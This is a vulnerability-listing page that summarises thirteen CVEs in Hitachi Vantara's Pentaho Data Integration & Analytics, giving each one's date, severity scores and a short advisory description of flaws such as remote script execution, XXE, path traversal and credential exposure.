VYPR

Pentaho Data Integration & Analytics

by Hitachi

CVEs (13)

  • CVE-2025-11159CriMay 13, 2026
    risk 0.59cvss 9.1epss 0.00

    Hitachi Vantara Pentaho Data Integration & Analytics of all versions contain a JDBC driver for H2 databases which is vulnerable to external script execution when a new connection is created by a data source administrator.

  • CVE-2025-11158CriMar 10, 2026
    risk 0.59cvss 9.1epss 0.00

    Hitachi Vantara Pentaho Data Integration & Analytics versions before 10.2.0.6, including 9.3.x and 8.3.x, do not restrict Groovy scripts in new PRPT reports published by users, allowing insertion of arbitrary scripts and leading to a RCE.

  • CVE-2025-0756CriApr 16, 2025
    risk 0.59cvss 9.1epss 0.01

    Overview   The product receives input from an upstream component, but it does not restrict or incorrectly restricts the input before it is used as an identifier for a resource that may be outside the intended sphere of control. (CWE-99)   Description   …

  • CVE-2024-5706HigFeb 19, 2025
    risk 0.58cvss 8.8epss 0.01

    The product receives input from an upstream component, but it does not restrict or incorrectly restricts the input before it is used as an identifier for a resource that may be outside the intended sphere of control. (CWE-99)  Hitachi Vantara Pentaho Data Integration &…

  • CVE-2024-28981HigSep 12, 2024
    risk 0.55cvss 8.5epss 0.00

    Hitachi Vantara Pentaho Data Integration & Analytics versions before 10.1.0.0 and 9.3.0.8, including 8.3.x, discloses database passwords when searching metadata injectable fields.

  • CVE-2026-2253HigMay 27, 2026
    risk 0.50cvss 7.7epss 0.00

    Hitachi Vantara Pentaho Data Integration & Analytics versions before 10.2.0.7 and 11.0.0.0, including 9.3.x and 8.3.x, does not prevent certain XML parsers from resolving external entities.

  • CVE-2025-24908MedApr 16, 2025
    risk 0.44cvss 6.8epss 0.00

    Overview   The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize '.../...//' (doubled triple dot slash) sequences that can resolve to a location that is outside of that directory.…

  • CVE-2025-24907MedApr 16, 2025
    risk 0.44cvss 6.8epss 0.00

    Overview   The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize '.../...//' (doubled triple dot slash) sequences that can resolve to a location that is outside of that directory.…

  • CVE-2026-2254MedMay 27, 2026
    risk 0.41cvss 6.3epss 0.00

    Hitachi Vantara Pentaho Data Integration & Analytics versions before 10.2.0.6 and 11.0.0.0, including 9.3.x and 8.3.x, does not apply ACLs on certain API endpoints related to platform mail notfications.

  • CVE-2024-37362MedFeb 20, 2025
    risk 0.41cvss 6.3epss 0.00

    The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval. (CWE-522)   Hitachi Vantara Pentaho Data Integration & Analytics versions before 10.2.0.0 and 9.3.0.8, including…

  • CVE-2026-2255MedMay 27, 2026
    risk 0.28cvss 4.3epss 0.00

    Hitachi Vantara Pentaho Data Integration & Analytics versions before 10.2.0.6 and 11.0.0.0, including 9.3.x and 8.3.x, expose Hadoop cluster credentials in plain text through the Cluster Test API. Although the user should not see those explicitly, the defect is mitigated by…

  • CVE-2023-5617Feb 28, 2024
    risk 0.00cvss epss 0.00

    Hitachi Vantara Pentaho Data Integration & Analytics versions before 10.1.0.0 and 9.3.0.6, including 9.5.x and 8.3.x, display the version of Tomcat when a server error is encountered.

  • CVE-2023-3517Dec 12, 2023
    risk 0.00cvss epss 0.01

    Hitachi Vantara Pentaho Data Integration & Analytics versions before 9.5.0.1 and 9.3.0.5, including 8.3.x does not restrict JNDI identifiers during the creation of XActions, allowing control of system level data sources.